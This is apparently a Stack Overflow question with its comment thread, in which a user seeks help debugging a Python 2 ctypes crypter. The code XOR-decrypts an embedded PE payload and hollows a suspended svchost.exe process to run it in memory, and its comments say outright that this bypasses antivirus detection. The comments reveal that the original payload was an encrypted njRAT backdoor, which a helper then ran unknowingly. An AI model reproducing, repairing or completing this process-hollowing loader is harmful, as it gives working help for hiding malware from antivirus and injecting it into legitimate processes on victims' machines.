1

I have to project to learn to realize a runPE under python (for educational purposes).

However, as I do not know much about the domain, I try to modify sources in order to make them functional (because indeed, all runPE projects under python published on github do not currently work).

So I decided to train under the project: https: //github.com/oueldz4/runpe

First of all, to be clear with you, I need to talk to you about what it is.

RunPE is the generic name of a technique used by many malware.

This technique consists in launching a new process in pause, then replacing the memory contents of the executable in pause and finally to release the process. This allows you to run a complete executable without having to put it on the disk. This avoids detection by the antivirus.

https://www.root-me.org/fr/Documentation/Applicatif/RunPE

So, as you can read, this method is used to infect a computer without being detected by Anti-Virus. However, for my part, I wish to realize this educational project. The world of security interests me a lot, and it is true that understanding these mechanisms is useful not to be infected yourself by downloading files on the internet.

Let's go back to the problem I'm having.

The crypter finally outputs this code:

#!/usr/bin/env python 

# This script uses the runpe technique to bypass AV detection
# The payload it contains, is encrypted each time with a random key

# INSTALL pefile and ctypes packages
from itertools import cycle, izip
import sys, pefile
import ctypes


BYTE      = ctypes.c_ubyte
WORD      = ctypes.c_ushort
DWORD     = ctypes.c_ulong
LPSTR     = ctypes.c_char_p 
HANDLE    = ctypes.c_void_p

CREATE_SUSPENDED = 0x0004
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [
    ('hProcess', HANDLE), 
    ('hThread', HANDLE), 
    ('dwProcessId', DWORD), 
    ('dwThreadId', DWORD),
    ]

class STARTUPINFO(ctypes.Structure):
    _fields_ = [
    ('cb', DWORD), 
    ('lpReserved', LPSTR),    
    ('lpDesktop', LPSTR),
    ('lpTitle', LPSTR),
    ('dwX', DWORD),
    ('dwY', DWORD),
    ('dwXSize', DWORD),
    ('dwYSize', DWORD),
    ('dwXCountChars', DWORD),
    ('dwYCountChars', DWORD),
    ('dwFillAttribute', DWORD),
    ('dwFlags', DWORD),
    ('wShowWindow', WORD),
    ('cbReserved2', WORD),
    ('lpReserved2', DWORD),    
    ('hStdInput', HANDLE),
    ('hStdOutput', HANDLE),
    ('hStdError', HANDLE),
    ]

class FLOATING_SAVE_AREA(ctypes.Structure):
    _fields_ = [
    ("ControlWord", DWORD),
    ("StatusWord", DWORD),
    ("TagWord", DWORD),
    ("ErrorOffset", DWORD),
    ("ErrorSelector", DWORD),
    ("DataOffset", DWORD),
    ("DataSelector", DWORD),
    ("RegisterArea", BYTE * 80),
    ("Cr0NpxState", DWORD),
    ]   

class CONTEXT(ctypes.Structure):
    _fields_ = [
    ("ContextFlags", DWORD),
    ("Dr0", DWORD),
    ("Dr1", DWORD),
    ("Dr2", DWORD),
    ("Dr3", DWORD),
    ("Dr6", DWORD),
    ("Dr7", DWORD),
    ("FloatSave", FLOATING_SAVE_AREA),
    ("SegGs", DWORD),
    ("SegFs", DWORD),
    ("SegEs", DWORD),
    ("SegDs", DWORD),
    ("Edi", DWORD),
    ("Esi", DWORD),
    ("Ebx", DWORD),
    ("Edx", DWORD),
    ("Ecx", DWORD),
    ("Eax", DWORD),
    ("Ebp", DWORD),
    ("Eip", DWORD),
    ("SegCs", DWORD),
    ("EFlags", DWORD),
    ("Esp", DWORD),
    ("SegSs", DWORD),
    ("ExtendedRegisters", BYTE * 80),
    ]

encryptedbuff = ("\x75\x6c\xa6\x63\x3a\x37\x36\x63\x35\x62\x38\x36\xc9\x9c\x39\x37" 
"\x58\x23\x5b\x55\x53\x10\x4a\x0a\x14\x05\x50\x0e\x4b\x53\x14\x4c"
[...]

)

randomkey = '866c976c1b' 

filepath = 'C:\Windows\System32\svchost.exe'

si = STARTUPINFO()
si.cb = ctypes.sizeof(STARTUPINFO)
pi = PROCESS_INFORMATION()
cx = CONTEXT()
cx.ContextFlags = 0x10007

key = cycle(randomkey)
decryptedbuff= ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(encryptedbuff, key))

# Get payload buffer as PE file
pe = pefile.PE(data=decryptedbuff)
fd_size = len(decryptedbuff)
print "\n[+] Payload size : "+str(fd_size)

calloc = ctypes.cdll.msvcrt.calloc
p = calloc((fd_size+1), ctypes.sizeof(ctypes.c_char))
ctypes.memmove(p, decryptedbuff, fd_size)

print "[+] Pointer : "+str(hex(p))
pefilepath = pefile.PE(filepath)

# Create new process in suspedend mode using a legitim executable (Ex. svchost.exe)
if ctypes.windll.kernel32.CreateProcessA(None, filepath, None, None, False, CREATE_SUSPENDED, None, None, ctypes.byref(si), ctypes.byref(pi)):
    print "[+] Process successfuly launched"
    print "[+] PID : %d\n" %pi.dwProcessId
else:   
    print "Failed to create new process"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Unmap the view of sections of the new process created
if ctypes.windll.ntdll.NtUnmapViewOfSection(pi.hProcess, LPSTR(pefilepath.OPTIONAL_HEADER.ImageBase)):
    print "[+] Unmap View Of Section Succeed"
else:
    print "Failed to unmap the original exe"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Allocate memory to base address of malicious executable in suspended process
if ctypes.windll.kernel32.VirtualAllocEx(pi.hProcess, pe.OPTIONAL_HEADER.ImageBase, pe.OPTIONAL_HEADER.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
    print "[+] Virtual Alloc Succeed"
else:
    print "Failed to allocate virtual memory"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()

# Write in memory malicious file's header
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase), p, ctypes.c_int(pe.OPTIONAL_HEADER.SizeOfHeaders), None):
    print "[+] Write Process Memory Succeed"
else:   
    print "Failed to write to process memory"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Write sections one by one to memory 
for section in pe.sections:
    if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase+section.VirtualAddress), (p+section.PointerToRawData), ctypes.c_int(section.SizeOfRawData), None):
        print "[+] Writing Section "+section.Name+" Succeed"
    else:
        print "Failed to write to process memory"
        print "Error Code: ", ctypes.windll.kernel32.GetLastError()
        sys.exit(1)

# Get CPU context of this process
if ctypes.windll.kernel32.GetThreadContext(pi.hThread, ctypes.byref(cx)):
    print "[+] Get Thread Context Succeed"
else:
    print "Failed to get thread context"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Push the address of entry point in eax 
cx.Eax = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint

# Write ImageBase to Ebx+8
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(cx.Ebx+8), (p+0x11C), 4, None):
    print "[+] Write Process Memory Succeed"
else:
    print "Failed to write to process memory"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Replace CPU context 
if ctypes.windll.kernel32.SetThreadContext(pi.hThread, ctypes.byref(cx)):
    print "[+] Set Thread Context Suceed"
else:
    print "Failed to set thread context"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

# Resume the process so windows continues the execution
if ctypes.windll.kernel32.ResumeThread(pi.hThread):
    print "[+] Resume Thread Succeed"
    print "\n[*] RunPE Succeed"
else:
    print "Failed to resume thread"
    print "Error Code: ", ctypes.windll.kernel32.GetLastError()
    sys.exit(1)

However, this code brings me the famous error, 0xC0000005, when I try the runPE with svchost.exe

After multiple research, I still do not understand why I'm getting this problem. The functions I use seem correct and appropriate, if I compare them to some equivalent projects in C or C ++.

Indeed, my code goes through these functions:

CreateProcessA
NtUnmapViewOfSection
VirtualAllocEx
WriteProcessMemory
WriteProcessMemory
GetThreadContext
SetThreadContext
ResumeThread

I became aware of this project which indicates what steps must be followed to obtain the desired result: http://www.rohitab.com/discuss/topic/40262-dynamic-forking-process-hollowing/. And actually, the order of using these functions are not the same. However, it seems to me that the functions used in the project github of oueldz4 seem relevant if I believe the comments left by the author.

Can someone help me better understand the origin of this problem? I do not know what I missed ...

P.S: I'm trying to do this under windows 10 64 bit and python 2.7 32 bits. In addition, I have shortened the encryptedbuff variable in my message because it takes up too much space.

Marshall Cocop
  • 151
  • 3
  • 16
  • In cases like this, it's best to include *OS* and *Python* version / architecture (seems to be *Python2*). – CristiFati May 15 '18 at 10:16
  • Also, please check [\[SO\]: How to create a Minimal, Complete, and Verifiable example (mcve)](https://stackoverflow.com/help/mcve), as the code doesn't work (because of `encryptedbuff`). – CristiFati May 15 '18 at 10:36
  • It's the lack of `argtypes` and `restype` for imported functions. Check https://stackoverflow.com/questions/48788549/python-ctypes-oserror-exception-access-violation-writing-0xfffffffffa1c001/48811895#48811895. – CristiFati May 15 '18 at 10:44
  • Thank you for your answers. Regarding encryptedbuff, it seems functional on my side (I just reduced it in my question because it took more than 700 lines all by itself) @CristiFati And I edited my message by filling in my OS and my python version – Marshall Cocop May 15 '18 at 10:59
  • Definitely not a good idea to include the whole thing in the question. What does that buffer represent? How did you get it? On 64bit *Python* I don't get any *Access Violation* but an *Invalid access* at `if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(cx.Ebx+8), (p+0x11C), 4, None):`. – CristiFati May 15 '18 at 11:09
  • You are right, it could not be a good idea in any case. This buffer comes from an executable of an old project that I compiled under python. I used it as an example, I can assure you that it is innocuous. But I delete the source all the same. – Marshall Cocop May 15 '18 at 11:17
  • It's weird that we did not get the same error ... I'm running 32 bit python. Maybe because your cmd is not running as an administrator. – Marshall Cocop May 15 '18 at 11:20
  • My antivirus started to complain about `Backdoor:MSIL/Bladabindi` on your buffer. What are you trying to do? Start *svchost* and inject some malware? – CristiFati May 15 '18 at 11:46
  • This tympanum is encrypted, effectively if you decrypt it you fall on the buffer of a malware generate by njrat. I did not dare to tell you for fear that you panic or anything. It goes back to local address 127.0.0.1 so that I can perform tests. The main purpose of a Runpe is to actually bypass the detection of antivirus..So, it is normal that I use a malware to do my tests ... I appreciate trying to circumvent these protections, because this challenge is more pleasant in my opinion..I do not want to hurt anyone; I just want to learn how some people do to override these securities. – Marshall Cocop May 15 '18 at 12:03
  • And I did not think about the consequences that it could have to add my entire code. I assure you that my intention was not to hurt you, besides the code does not work. By the way, you can check yourself to or point this server: it is local. But now, I doubt that people will take my motivations seriously. It is difficult to convey one's sincerity on such an area. – Marshall Cocop May 15 '18 at 12:07
  • I killed all the *svchost.exe* processes created by the failed runs. I will do further testing to check all the implications, but I'll have to create a *VM* as I don't feel comfortable doing it on my physical machine. **You should place a _VISIBLE_ note in the question stating this stuff**. – CristiFati May 15 '18 at 12:12
  • Of course. If you want to check my writings, I invite you to upload to your VM Njrat, and specify the port "5552". You will see that you would fall on your own machine on njrat. – Marshall Cocop May 15 '18 at 12:18
  • I have edit my post. @CristiFati – Marshall Cocop May 15 '18 at 12:30

0 Answers0